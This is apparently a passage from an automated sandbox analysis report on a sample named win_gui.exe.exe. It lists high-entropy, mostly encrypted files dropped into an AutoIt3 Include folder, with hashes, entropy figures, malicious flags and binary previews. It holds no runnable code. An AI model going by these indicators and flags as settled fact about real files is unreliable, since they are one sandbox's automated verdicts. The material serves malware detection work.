                                Preview:....f......=Kv...t&.K.....Aq,.@p.I.t+.....d..~..?z.{.....|..$..'$|. .8.l.^......_.P.w.%XCg../*p$Y... UJ....yn`c.$...Z.\e2.\.O...J.........l...D........B ......~..WL......u.K~50i,R.b.;.4.CF...}q....:.1y(.F..=L...'......Ku../..hr...B..l..K.....h..e.l.Gr0)y.m....V.....S .#..e...^....2.a..!N..4.....{.O@....Ca...kS8.a..TS.....s..TaLUrR...&X.}....|...y...y.r_9X8.h#....D..'..c.n..*...(...'.Lvmk..#G..\........}N..s..I...`'.P<S3.-.H....4....4...bx....L.....y..#2+mz..x.........~--R.@...^..D......}.C.....FdAr'+.J.i..j....+..uy].....A..:.8zU....:.i.R&.\.........j5.......W..@....X../.n7A.E..2.%.....g$OI.q..3.<.E...e.-.....V-Y...d..D:....eC.\.1..9l0..4.3.r.H.}...#....v...l.B@(.Lm(F..0@.ux..x..y._s3...AK>...Q...H3(.@...I.W>.......[..W.Y.v$......L.y.S.~.8.D...~..TU5..a9...!kN..[&t.U.U..\.DQ..5...k...K.A.....D.f.......S.@..s....R....,&.../.mS...H.+.~.....uL.=...e.)..O..,t.....g...'@I..9...CjyM..&.2...2...t;...LZzM.=4.g..LZb.]..i.`q.j}s...@.[.%P.9_...R.zY|."C...

                                C:\Program Files (x86)\AutoIt3\Include\WinAPIEx.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2215
                                Entropy (8bit):7.914268010192206
                                Encrypted:false
                                SSDEEP:48:XV9wGQY+QujhGMqariuLn15sYsaWi+z8Amf/WyYu+MAVMJg6T8jk:3QfZqyL15sdzSfevuAVO8jk
                                MD5:5CDAF28294CD49C96460F383DAAFA323
                                SHA1:DBC6B8E385DB7F3CB633A772B009B778F5DB55C2
                                SHA-256:6C28F6D6900D1AC9E377DBB390925F720D43CBEB2347FFFABB881047107460CF
                                SHA-512:E5FCBBD0578BA4A81765DECBFB7C3A1224F510BB4AC2C600933240DEEF8DF4F3E6FEEE05753A7DC5B725D34652A382B71765394D5C4E5A630C647340F28D1866
                                Malicious:false
                                Preview:.Ft......4..m.q.)j....?......vs.O.....U..=./.6w#.+3.`......3..f~....x.A..<..[.....8.A.v..a....h..2..<....({..r.....k...}=.Ko{2z.'..L* .(......=.M.z....@.V....... Ty^#........d..V.V^..J.$X.........I.1c.......Is..%..uK..*..[...PC.i.......C.z.B.S....Cn./^.n.c.1...'r.....3H3.3.c....1.=g.=_.E.f......H.\tQ.py..{.^...zM......}..n.o..@..b..<yi...e.F...=.7<..A....l.Y....YSU.U#..4{.C.-zy}=.......C. .ed.,.riGL{..9.\.k.......i....._1.]]..3..$.....g..V...c..|...mJ.....x[.(.4.........S/!.4c,..D...Z..E..}.G..Zp..$.:....{..b.W'.L.........u\.....8&.........`.t+.....N.,.e.Nr......3.+.LW.?.!1yR.Z.@.&Y...V..RKR..}.%g..k|KP.s-.L..e.*....D...l.E..Z.......Q.......&..P/.....n;&..&:...6...X...N.5@.`..:.|&""....x.k.C\-E...i.6BT.e..J.kJ.-.{%.;j...W..Y.a.......A....j..l;t...&C..Y.L{.?._...|&.'.i.h.u.$.\a.-6../.\W..}S...nyeL.4..'.'...2.1..... ...x6.0e...@.?.1....j.~#.....k..+!..|.J.....~..i^.....6...%.};e."g3.Y........`.]...6.r..X.u...-.G.~P...a..DO=h...c>VK..j...)....h

                                C:\Program Files (x86)\AutoIt3\Include\WinAPIFiles.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):96134
                                Entropy (8bit):7.997944598452704
                                Encrypted:true
                                SSDEEP:1536:YVTouI2r7FTe5YGFSxuoj95BLWFHd2DR+XW56Ic6er55OrYRWGuVFjQd+V:eTgKFTe5jIsoj95BLWFHd2DCW56Zr5kB
                                MD5:35E96EE34AC94F3FA9A560D086FC1E14
                                SHA1:41BF2E228A0C0D5FDE7CEE4683312E8807C283E3
                                SHA-256:2C31F2FE56E276E3A45BCCE794CB6BDF901B95CDFD5502A4D6A3CC0BC6310BE0
                                SHA-512:383289B7156D24CF52D8A231A599C373AF0055591CDE17CA7582DDFA9F2E8D3E103EBFE0A6FB70C44BC80E22FFF9BAEB46A5071C8AAE1148C4DC27826935F1F7
                                Malicious:true
                                Preview:.\....?....O#.<...B.B.yQi.y...@..7..Ep............{7.P..}...gV..x...E.7V...{...3..p)..Tg.Dg}.E.....M..E.].....zGO.A..\.k...H..1.3.!.R.....'...M.........H.....4*=/.S...a.......|_.f...Z....nb.D.@..@...s..W!.p.....p......`.HoY.^Y.1s.S_"r.o.9..1\....n.A....?........../d..v...{.j..V.."QP(...........K..*..y..1...t...9.i..J....E@[.z.....*E..j.=.0..V..l.;`.J..x\.."....O...;6.....G....?x.k....z.*i.z.^..Sy...i_,...Y....M.........=...t[{!...G....aP.oS.......S.7.*&D..I...f3.H3DC.. ..OC&..H.v'7.9#SGP....f.Z5...a.k..X?.'|Mr.T.u..Z[.........4.l..e.fX.t..d.Z..!R.%f..N....'p....`V'..k.G..* \..0...E..a.".^.2.s[..E.....d..g,u...7.C..W8kW....J.).g<.3....,.....[X....G.5...4.........O.]{.J..q[...-^&...|.vr..<d~*..|..;..d;.....>'....~K..4&:..b`..........l(lMa0,B....r?.K...y..o.,rLl..}.f.fq..X.........,S...i@t..H..J..(....h.N..9.n..w/x.{VA..O&:.. ...p.c..........1:.m0i9........1......`0....XH..A...."0.w.l....1..........u..B.ee.E..vU.`h}Zh..}xc/A!.6f...u.{!....,{hA.

                                C:\Program Files (x86)\AutoIt3\Include\WinAPIGdi.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):204689
                                Entropy (8bit):7.998953386038572
                                Encrypted:true
                                SSDEEP:6144:L7m5HDV3QHORlZY92Wn3zIb88zK5Tod+A:L7m5hO0ZY0Wn3zkR6ah
                                MD5:156B24A8C90C95A8C8245156958D6F42
                                SHA1:898263276E98D291A3728402DEF8290E1E104D8C
                                SHA-256:A3A5A2704F3F73ED234D4E51C92C5C93FE6464B253DF7805F02FDF98BC942C83
                                SHA-512:97082E9B1FEEACE6672154BA6FD40986033B891F764D4C49FC971C46D62F014C8943F468B409D3AEAB9BCA57112AF5974B35964F7958714081966251A6D8DABD
                                Malicious:true
                                Preview:.'...u......r.n...:....>.L@.D..-......cn....../../.2.3.+..6r.....k...4_........0q...s!....r.u.....Y.~.(........V'...@....4..Mt..KP`=y|.SOL..N..?m....|(..<...f...X,x...O..jI3..b.........0Y....K..b....h..c.......e...D..P.k...S}..V....uE.:....|.-2\...3.}....W..Q...L.......#..e.....m.3..'._.A"F...\+.]...Dr....r..(2b;........,..a=...;..o.U..|......8.\.v..e..=o".A.x..bE3c.%hc....^..@...p.......Q........M>.9.>rv.r...i9....?....z.YN\.x2S.ct..{.........k.....V*..Uj..(...6.C....q..G,0.Y_.=]k.!}....].....1..H...:dl......&C.k..{.....B.=.X<S=x~.....aL.F.tU...BG-^|.]B...9)......B.8]..]..g...S.N.....-.}w...jq.#.:..q..c.z:}G.p.-..s1..E.k.d..3.4I).m..5.F.pg..6..&L#w3.R..>i....6I......}LD.[...DG.V.....=.Vn..^........$....kf...Z. ..M.G...f<?..v.N....q.}.G.....%g\../.Z....A..V..(.f..K.S.....A.w:.....^...s4U.M..r..;.$.@....../wv.e........l.o.E.....5KU..i(>.3.y.M....85..j.......qN..R.._..7..U..ou...D.4BX..9]......^.G.V..M8........I...7..(...l...CB..W........Q..]

                                C:\Program Files (x86)\AutoIt3\Include\WinAPIGdiDC.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):20569
                                Entropy (8bit):7.990741444866277
                                Encrypted:true
                                SSDEEP:384:5irAwJ+H64sfscmTYYEMILyadMuwp1ygVRMTINOar/AW/dEdZXmWbTStUU4nm4W7:srFi6RfHmTfEMI15wXygHmM/dEdZxTSv
                                MD5:037D346EF8654808A016C1D362C7EC50
                                SHA1:EE25CA72B04D2B9D31B5C661529E23F93490CF95
                                SHA-256:EEBE2BC788F6BD503F6286B5F0522466D00C09A8F5E7CB45A826B31CBC0E1CDC
                                SHA-512:759BF0D8DF0BF514C89B77095569F1AAF8C059B1D9AF126B23A33E39BA91E36141419839C1A8E81564FA5584B7F60618111B444B37E783C0F0ADE53B2A9126F4
                                Malicious:true
                                Preview:A..Fn..yV].|..YT]q6..*,........q..s...Os..........\!.@.c.....eE.z;...O...y.jd........0...?.n...h.[.x...."..h.3..".eR..~.=Z...n.....>....#eA...1..~.......6ta..Q..z.....R..)~i3.)G.!:p.].aBuo.u..J....j4c&...yR5.[q..09..Vc.kp...?I&..p....u.Rr...m....f.Cp8*.....xd.ED@...g...4Fd.....F.......gD.02. .<..m.$M.Q.x.-.l1p..".[...K...m...Z..i.u.-..c.7X.*..@.. ...b....X....../.N..6..!..Z....a..D....k.D....M.{9...D..n.0h_...4.x``....Z.q....,..7..KD...P....,........N.^.m....[..B.......).s.37.4.@2.t..#..{V@<N..@.....0.d...g..O(..h..-.. ..D,[t....E.oX.....S.....B_o.o..W....h....<....gwv.0?.qn.3...x.z>..y....m.a!od....-sP,4.z7.....X/.wB..'`...2..A..c@.b..N...?..G}..D./.e_..N..r....v...d...v.(.+xY..%)+..?..X..bj....95(.QJ....{.gx........=VA..'.y..Xd.....O......0..v.....Y.q}..t...EIc..p.8.......t..tq..X..j..2S.h..(.4J......?.:`_..2..%;.7p$.J.....+.fg.o..n....>.234..&..=.s..W..1..(.L@r....A.-....?..cl..<.......Q....D.-...u.c$......E..*.3X.A....".. .

                                C:\Program Files (x86)\AutoIt3\Include\WinAPIGdiInternals.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):30134
                                Entropy (8bit):7.993583297375008
                                Encrypted:true
                                SSDEEP:768:dkuqDArppbKd9O+LZztnF9cIy4Lckx/2Iewn882ryUC7WMac:HUAryvOEvcl4LivM882srj
                                MD5:4CDA38949198BAE427B720A3899850A6
                                SHA1:DAA6530A920CD68683C01414E5AA48384139A68E
                                SHA-256:1A02D43714B8890FE8323F2B071EFB3125C276438ED84E9B9602D51DA6265119
                                SHA-512:954C530A79FB09FEC1DE5A2CD436E2AE87BF45FCAC7240E99C82F0B99509D4EF53FFE5ED856733A600C0707368B4F6135CEDC8F1F9F5314053D89056EFFDE202
                                Malicious:true
                                Preview:"../,..\yVd-*Z.s..p.3...q........T.Rr.^..}...Y..I...q.....9_."..#.?V.1.}a.gi..R^.4=d...+.0..+...MH.,...&..i....u...U/.....lr.p..n.r....5L...L...P.h...o>W.L:..:.w.1.!./0vM.L..I..h..m...8*.. ... .&...d..%....Noq.S.g.c..w..<..%.O....1.*.u......Nlot.....Owq...<....hd.p.Y..].s.s...2...c...)..>...(.....B.../4u.W.U}......n.E;...j.l2q$Tb.2P.AN..Z.Mqu}....E...D...;...h#..B..5?....gZ.h.&.9n.w...Q1.Zv...e.p1P.Z..C@>+Y...4...1./mb.{.]....R,p....Z.y..S]...I.@....-O8....).".;~.OB.i_.0....(S..;w....QZ.m..>hYV(.....P.&0{|...K.v........*..be[Rg......P.Y..^..D.d.<.....,G6....T)&R..<.<#..3qZ.`..{...,4>l".c....a.q`...y...).^..._. .1..X.;c.qo.b.E*{.kbi..6F..k...0..&8.Dj.z.%."2&.z...}LU.l...1k%......[lf...2.X.......r?.%x....;t.......6.eQ....Ly...aq..r0...,.c.v........F.j..C.....%.)..b.....O..B.ou.q".W.l...>$).. ."jo...Q...\....iJ.\7.L..K."}.."......lP[./....L'..\...y8).!......M..'.?.70..._...............q..^.........v. .?.,.AR.i.&. .d....a..1.t..K.@[..1..

                                C:\Program Files (x86)\AutoIt3\Include\WinAPIHObj.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):13689
                                Entropy (8bit):7.985370118783377
                                Encrypted:false
                                SSDEEP:384:J+zEWzJgt9Zv+NCIeuGZWkoWn5dcrwWMyNwr+VOe:aHgt9Zuv3Vk3n1y4K
                                MD5:6702A4DEA1D88FAACE2FB7E7A7F399BD
                                SHA1:AEEC92DEB58C6B6FB5C6524949814C85780D387E
                                SHA-256:0FA92F9F0FE495D3F92A8956447DE2C06571AD77D4830D94AF548481F3FC85A0
                                SHA-512:51773BF2D327B9827C5386A03FB6C37BBEC289834ACEA17CD3C36111922ED61F2CB795D87BA6FFC25DE30239DE44B78DCE1A1FFAB1632855A0CCDCE156358FAB
                                Malicious:false
                                Preview:f.F.6..._g..d&.Yi........'....K...F......7.rd,'L..\.j-.9.A...89.Y..;E....K......*..w|..].V..aJ......~.x;G.F..U.."xO..m.NBt..U..:v..r.8.../...w...:)..@Q..:.....x...fT.4.&xQ.....y...Qx.*.;SW..UB.q..<..Ha...\5..-....h7....W...i.\...f.Fs....uV.l.]..X ....<v.g..,..Uu..w..+....B.?..N}..,...4...9 ..>aa~Q..m=..e..;.Y8+.R.+..'[.,...yfx....V..=....n.zM..v./...0..%....../..#.CZ5..m..yVZ_I.:H!.fG.d..V.<..N&...H.y.h.v..H....z....I.r+...5.+.y.....:..+.b.&.V...GKa7.Tyf.g...._..NU|...!.........Rm..........,.M.<$4..'.7K...~..B.*o7CILY.(U.9c.*.:7.Vy..2K,f..M.........6..oogg..])N.Q..;.v...v...|....~..JDC...x........Lc..Z...$.[t...k..AFT.[........o+..Z1^gn.....9..$B.......-.......'z.~WE...e....V..Du..]`.[.v..DTl..g.L.B...}-.*......".1....N.,.Y0..@.D.m....r.&..-...G6.."jdE...+c..H.^.2.*.0...zs>_...F.....T.?.}.i-....o........E.@.3.A..m..e..N........k..+3*....J..9..7%.....V.....a.._..].>..E..s....G.M...k.i._.?p.._?.-.:..P.y.g...9.m...#..Cj..<.....<@K)..*..

                                C:\Program Files (x86)\AutoIt3\Include\WinAPIIcons.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):26096
                                Entropy (8bit):7.992708898630628
                                Encrypted:true
                                SSDEEP:768:tUKdDAbw1tAZMfJxkAhb4hNiRNOB4J4EF1O:RKZKCiRNB4u0
                                MD5:E2711AF78977AE8B8D1273A354AD190C
                                SHA1:54849E75FA095A1F1A304B911EC5CE39E2ED81D3
                                SHA-256:DFFEDD1F52DF1D3049221E63407C1703E05D95152688212065F9D808B89B72A8
                                SHA-512:6B7DC28CAADF0295DE7178D0A32BED2BBDBBE5D28FE176D4AF31EF378CAC17A22681BAFA0512CC23AF601D2FD4FF7B3491255C2B10417A2C3FD11E8CE0A469A9
                                Malicious:true
                                Preview:.3..g(...<.:*..;.....V..!h....4N.}..7....[..Ox....W.w.j......(Q..[...2..V.I.;..fV.Kq).R.Qr...I...JY...W.&..x.LU.O.e.vv.).n.Z4.;.j.q..':.k.B?j..t_t...i.8.N...7..?....Eva...V_..\?.h......MM..L....~b...9N.....L>\./:.....j..X.^.....sf.....MW......W"....3.D...E.SiMzp...n"..DC...p.7TW........p.d........1;^I......4......{J.Z..Y^.r...t.Jz.]R(.d..'`n.@..u0v.i.U...x....j...o..>.J......K....MH[-D..N(J...;.7,.p.ODqJ.wM9.....3.\.3.],...Y.dL.S...@.rc..G]".>T.T...ZJ...FL.9,........9D..G..;..a..k'.....$.G..Yi.Y..O._..@.VL....!..Y..Z.....-....|...K...-y.M2...}s........[.[p.(...L<.}..)W/(!-.y.../.....@....-q...\.m...c<.l.f.Q|M..G..A._Bo..1K.5V.....S.....I..]]5k..3.....yU[R....i:s..H.A......xh..-.M/......c.k...=SO..H..r.q..D.q.."..qK....W~[J./..q....5>....[?...a.+L.....Tg........i.v...c..... aV...~o...g.k..s4..t$..!.e...w...lqYI...1Z....@......E.n}.,...v9....."..j.v...0.....rAz.......d.B.[.1..8.|..}'..7`M..k@Rh.I.b......cT.Kg....(.....[..=..-..o..{...

                                C:\Program Files (x86)\AutoIt3\Include\WinAPIInternals.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:OpenPGP Public Key
                                Category:dropped
                                Size (bytes):18613
                                Entropy (8bit):7.99099778930684
                                Encrypted:true
                                SSDEEP:384:ZD5w+V2HJMhEJYcFLoVBF480N5f/3DWddYhlAsbUY3Gqn+VOd:ZD5xKJMhEJYcF+FofPDWohlAsbj2qnp
                                MD5:FCE0FB8FBAFC127C8960D7EE922B238A
                                SHA1:D20FA5772C47FA227F32A6A1E1A9B9AA894E6214
                                SHA-256:A01617ABDBC74E0634AC99772FE017329C3AF5E2236B536D101FBA928D211CA1
                                SHA-512:98C43DB8018628233B6BE057EA9EE37C26A077E53187F28486F75ACF2BE8F7B30604B29492196386462AFBC9C83F50B3F0DCD97C32ADA2F480074374305F616A
                                Malicious:true
                                Preview:.......-x..T...a?G...2.Q..J.k.IX...-.F}..D..oD...EZ...hO[...X......ch.U.9..N...0.!....X.....x.~y_..l/.J.~....'.9........}.......s.9.zx.....a]?.t..Q..'....-.7E..H.VS0...+&..G..y.R.>..16]..QQe...#.k.,.Em..|..)S/..+....S...~..]02.+mF...k.....=....B...I..Yx.~(.%..^ZWk..sa.P....8....*...R8.."a....].....D."..Uu8....p~3.bC9.w..^.X.%!S..%:J'k........p..~#.JcJUE...YK........V.|()...@e....5(f...i.x...qb...'.&#@$.D....e..*=.%4.~.....\.I.2...K.G|..+M...b......F."......../!.v.5.hf7.L....]*......>..<@..&<1....+..H."U.......)I/..._....JO....e.Q~.....C.$...u....j.Ku6....fc*-.|\<"|FI_gf5.4.$#.+pE..Ky..aL...ao.`.A4.@jv^.=.1.l.T....K..!P..*....._.....(.-+o^.DT..h..u..,.+D........0..`&b.!.N..#..Mal.S....`e.....Z.S)....8M.8...5"1..w...._s.q..U#.<....P&.0.?!:...tx1.......E.IG........C].....0.bi...GQD.,.}.8..Qn.0...r.o..^.Y.o..?.k..].amyE$4.i...!...}*.-....i....mP2..|.".6.......Q........|4..2sQ~..d.:g.G..._...hm........1....]H.^..B.4w...`Sbl....0..v...}....

                                C:\Program Files (x86)\AutoIt3\Include\WinAPILocale.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):21307
                                Entropy (8bit):7.990746048928715
                                Encrypted:true
                                SSDEEP:384:fo1Mng0tI4HnpW58VH2q75U0YlDe6Ba1ub1LSyH8rdf2W0jnOBb5FSDdxLpGn+VD:foP6jHnpesv14DY1U1LSok2WpBbHSDdV
                                MD5:1F60FB3D3679410747377F1FBB08A5F5
                                SHA1:84EED593DADFB4D0704F0DF436CD46CD3DA1471F
                                SHA-256:CB064730E6D2D3B36120C8E679FE7F31EF5390CD887BCC571A3B6333ACB42AF8
                                SHA-512:B7C3D94394D3D81F6ADCDAA17488F9D34FDBEF6102E45F222AFDBBCAD5E58B8110535CA68B3E0FC67ED6A3DBD8CF911537E0D7E76460552496CF042CFEDCDD9D
                                Malicious:true
                                Preview:O.P..LoC.r...u......S08....._.p..b....K/..j.....-.?f.:.......B.Hy.^+hX....c../.RcM.;..!U.`..i..&.....O@...M.4G..[..+..9D.jDN..^..L...D..J...@D.0w.eC.C..wj.H...1n........5Dy......S+...O>...H..p..5..b.P"2.L..X....A..O...o..7.~[.p..7.X.Je...VA..?g.7)).z.N.*1LNW.............Y"!.SGl. .....[..1.]u.....m..wS))e\Z.,.K.....}..O[...-.s.eig=...hKmz.b._.9P4..^....I....p._94.Q.n;,../...v`'3T..H8.!\..l...:F..CW>S7..Qw..*XW..n.|..J^H.%g86..s&....,w....Q+...t....V....<K.6.9/N...x.H<gw...T.7.W.\..r].........z...{.j..q..'@d'...p...pvY6"..K.:^.a..M.|..9.....Q .<.I8.9Sq.gG.x:.Eg.|Yt..... q-..D..@N..L...2.N.0..DO.....ygRegq[..3.W.R..r..*Gn.].F...K%...3(.V...#..#'%.E.. ...X..n...i..Vx*.Q|..<R....M,.?..>..O.s..`$.Le...c8....[.......cY.h~...bw.:..;.?.q....F...^.6.!..EX.OF.......[Mp..hE...B.zA..G.(.L...+J.!..(..(......FB...@.I.(Z........-q..I.V-......>9.....<.8agrt....2~..]................E2.W.K2.lM.f..`..&....7....... Jw.j.5ZB.#J.%.g.W.<Y.....l...:[...@.|.....7.gI.

                                C:\Program Files (x86)\AutoIt3\Include\WinAPIMem.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):22118
                                Entropy (8bit):7.990206503294256
                                Encrypted:true
                                SSDEEP:384:TGzXDsB7zDlznHUyfbAdQ9Dl0ErrAy0ZMvz2PiMl9vDFcDJBr+eUP7S4BruI+hlF:TkTsBdHUyfbAdQXfws49vACVP3BruXPF
                                MD5:9753376BA3F73A2A0B39B0F14DD0A397
                                SHA1:3F487AC1EDDD574F5188E765AEF8E85C7AC9A966
                                SHA-256:85CA1977149AF1B2A0956553CD3FDE64221BC162DE62066154120107621E2D8F
                                SHA-512:A36F563B5E15EC959607FFE01D742720CA56C7766DCFE5C0B4362C96D8C1B9B0498E3496BBDEC604B445C5FCC99F9EF589757442A162B80453522745CCAA6D71
                                Malicious:true
                                Preview:.s-....N+.N..!..v...d.8..V.q.... ...<.Nzbs...V.S.=.....3b.~!....kmV.$...DH.o.vf./S.........C.ca.....K...j.U.....q...1....j:.W....O..D..m,R..U..,.\.......F...ig...Ww..qX.k...1..8T5h..XfDWT,{.z"..q..'&..s....:.(....D......h...R.......*/._.D.bB....gWz.c..........9>.9....Z..!!..l...M7.5SX........:.6...>.1.'y.U.[Y.N%N.....=.P<....@..`O'p!.e.h .x22.G..g..m.D".....a...uE....?=.4y..8...)IY..t!..v........L.Z..U.D.e....m[..G.L$.m&..Zp3x`.3y.3....=.@.'< 6..'D.A.b./........#..wj..w..~S(.4.w..Y..k!.V............`i.7p..e.w..F...3.".*G3.V..MN.@.\K.....#.6V...J..=i..Z.[.j.j.k.5. G.+.lK~\....K~;\I.z........[.<....K.....W`ar..a..T$.r.'.pV.zA.=.....X...N.`...N.i=.p......\..s..?.+Z..(,y.pE.......<...F.l...cy.63........}..<&w.y*.s.tE...oc8.!{5....J.%.,.I..Q....PJ._4.+...U...i.LoE...z............I....V..`.............H.7..........i..\../.D..z..3..]v.#c.gS.P`.b>..-.....)D8........$.B.............J...&...'.....l/......}..(..|.f.|:.....LJ...#..5._7..!.

                                C:\Program Files (x86)\AutoIt3\Include\WinAPIMisc.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):14831
                                Entropy (8bit):7.987045338436014
                                Encrypted:false
                                SSDEEP:384:fsngrTVXsni/rWBSFTmHeN8qMCfWI/rTSfKAPxu2+zZ+VOP:RtsOrW+qHPqvOI/fEKb2+zZ7
                                MD5:69604DBC1506C4A3224D024C2158ADED
                                SHA1:09169F93CA1E75C60B6E83DC9C753F4E415BCE02
                                SHA-256:ACFE38285286844888286D48484F37460038EFEA5196AD8908DC181D3024D572
                                SHA-512:C5973E947E4E1BB62B335C68B5E510368C81F51F1DDE5A9D161BA095F802E9659ED223BAD4FB9627F69DA100D8655950F55B551222813C9EF976DEDB50D270F1
                                Malicious:false
                                Preview:v.B`.....]...F........x.O.-..}.`..[d6.......pzb.Z%\6S8......!b...../9U.$..Wt..]o..9....Ub.L.&s.....).Cq.p......<.t....o!......EI..H..9..#vXs.J C.......Y..i....|h.o.(.9.O..."2..}...Qvm...{f.k.......7m.E.;../9..L...|...l....#.(so.*~`"oR..c..E .......Qe..k.. .s{....S..L..p.{./...*-..=...C0.%..#..{..~%.`H"+....)..J....a..>....ok. 9...f.../..~.).\`....7.C.5..Q...#h!...uS.?xt.C.:....`...../Vd..CM...W.h..]C...8.V.].d.....n.....:x.(W.oq+}3..Z.........`.8r.....H./.........2...$.N.R..F.KP.fC:...P .......V..}.....ke.leDa..{H.6.J....K..h.........2..!..`......W.{.65.Y.C.9.m.U.%..1.{u.....I..:TkR.}b...........u..f..u..w..y.....x......v]QB.q9.}.K./Oq.9....eD+...=T(.."..y..2v.....a0> .]...n./.Wg.....<...1q.......t..cE.y....j.SR.(..d.5...........5..l...-..,..s.Y'......#.D.U.....[....3/y`#.....A...xD..F...7T...yw../xCA.}....].....m..G,Zcr..T.r.....O.O..O.[.fm...QX....CB....L.@.D;B...- 06.F{X..?....`x.'E....^.....p]...nF.j.?......N.Y.6>....ze..0..Qs

                                C:\Program Files (x86)\AutoIt3\Include\WinAPIProc.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):77237
                                Entropy (8bit):7.997643885981981
                                Encrypted:true
                                SSDEEP:1536:V5TUm4BbwyLpZD1awVeWSgecQ5MF0iHVd0sN2rz0gWTu9PkbsyKDeqXY4:V5TfGAdXJ55MF0iPdsrzAuNcKDeP4
                                MD5:7346C9D2EB98AC1075346703DECC8928
                                SHA1:1D26E6E6866C90EBA8EA72432C10236783F81FB2
                                SHA-256:7ABC1C0465643D5EFC880C750C81FA5867C7F52EE30C3C0A5526DE468A966A87
                                SHA-512:82E9BE820F0D6945BE604C751833636E3FECD9A5C3C37FF5563CFCB49120EC2D5F61043641756283CAE3B89B9352B2C454977BF69186CEF5F2DA7324E03B37D2
                                Malicious:true
                                Preview:...[...z...^....Z|....cp'..@...!.p...G)..5.1...b......N..;./.8u.b.5.......6b.j....d..sL.B..T>...pM.NF8.5.r.}...?....._................8#m._b.8.1.B.....W.e....t}.,...K....7.......|4..T....ps!N!.].(....#Z.z....@<.....y.O.._.I.....Q.....p.&..P......#.....x...7....{......._.).....N....&.'D..~.J..\Ea.j....{.'tV.wq.%.{.1.pT#=f.np."l...t5q;.<.-.....%..9..p".D...<..'ix....m...........>}..........O..B..3N....I...O...V...wG3.JL$L.$A)....O.2q..3.:....AQ. .3RY.......f......3.z..].%<H{........k..."E..GnV].f/WoK....s.>...r..N.._.'..?....-......4..`.......alZ.%.6.T..&*..,P.`.#......?<...XO..-.n%i\..G#.=...P......<.a*....K.....Y0f.%Q.P7|..U8....|3..c..2.g.-.$.b......(.=.....m....7w.`GV..u${D./.C_...4.....C.q...i.pg.N..p.7|....3(.gP...E..j....k.i..*..,W.....R6#....{.~Zs..>.R..._...I?.g.`...M@.L..jn.,...q..2........T..c2.._......C^.t%.8Mc..y&...+...g..Hd...^..U......W..+......^p..A ..6H*...Y)qv.2.z.b..O.@....:hpn......`d.[...Hs+...?.T..Z./}..L...s

                                C:\Program Files (x86)\AutoIt3\Include\WinAPIReg.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):35679
                                Entropy (8bit):7.994921127201841
                                Encrypted:true
                                SSDEEP:768:3B0wgAmKWDgjLyOrqFl2CMgBEE2xQFCX5aymigojkPHVPaq1:NJkgj2Qq0Y70QYwymR1L
                                MD5:C70F74B728F81348721FF3A5F0E7F7D3
                                SHA1:1362BBF0A5B3CB02916F044DB7450D4EF2779849
                                SHA-256:A500DE3C420FDEA4721CD03F67E4DD7F97ABEA28D6DA729ECAB8F27C0D59AAF4
                                SHA-512:BD71CC39EF3E09CF3EB05A41503C379ABD9FE82F7282558457121CC0A710428399CABF283473899FE7BA0CDA92537BECA64418F371BDBB8FED951DDC34020E7C
                                Malicious:true
                                Preview:..! vq..[\....:.*{=(.@.*...S.#..9.HO.i..]m........?....p.+2q.v.b.9H...L..4....I|.aY_........'.&.8..4.y...p.....M........{.K..af....-.W......O..z-.q..;....6..-.A.[4..+....F...,.2a........g...R...s..:J?..l............"zg..|..N...H..[~..S.I...}......%%vp...4......6.}.h..Z......e....../p..L..G.AP..*.Bl.Jb:B...A...D-.Q.....aB..A.......9V....-..D5.I....d..&.0.J.~FF~...+6....e.3=.n..5..A...ypF...An.4.uj..~'.:.Z.gG&..f.....!..../"9B.._dD...*....Ca...0...R......9}..W6....qC-......G^Y_.+oG.^i.MPr[nf=I.yz.B.U.6..Ma.kB.y{....BZ.[.Hr.E.:Z..!....|........`m.zu..[g4h.1....>....t..]..H....12....7..OY.~.Ma.dgY....]0......r..C.4...,......._R`.zjndOq?.....j*.....}.C.).i........n..fY2.{!.......t....*xy..=.g...*...2.&.l....3.b.d..o..(.N.5/....-.....;.....?..8`b........@....J../..j...j+.....k...Yj..../..\.H0X.....E...T..vN.7hL.<..N..."p.$k....~...Q.O.:dYW..A..4V...#e1L,8.....1.a......l..P$A.N...G..e.dX..p...ygE..Oy,..\n..z...i..z.oLV......].z...Ws.J....z.Bu.j.

                                C:\Program Files (x86)\AutoIt3\Include\WinAPIRes.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):38984
                                Entropy (8bit):7.995551107013911
                                Encrypted:true
                                SSDEEP:768:FAb2yKLIdr3OMqjIiCXxL7JfKtq14bOgDP9Be:3LKreMqj2xL5Eq6btDPu
                                MD5:C24155123912F79D83770B34DC14F774
                                SHA1:7E7FF4C6E5D56F127848BFE34F6DFF49B307E626
                                SHA-256:626AE14D43F7D4659BA5456AB4EA79625498265B18336AE9AF9DAF2567C5703E
                                SHA-512:F4FCCF9E7C0E5C31F85124F2B922CFD7BFD7BF52D0897620A2A5450AB6F9338CAAA94E94F0AE6107E0D6343539CDBE7F9D3B3E65E6FB06C54170D95CE438D423
                                Malicious:true
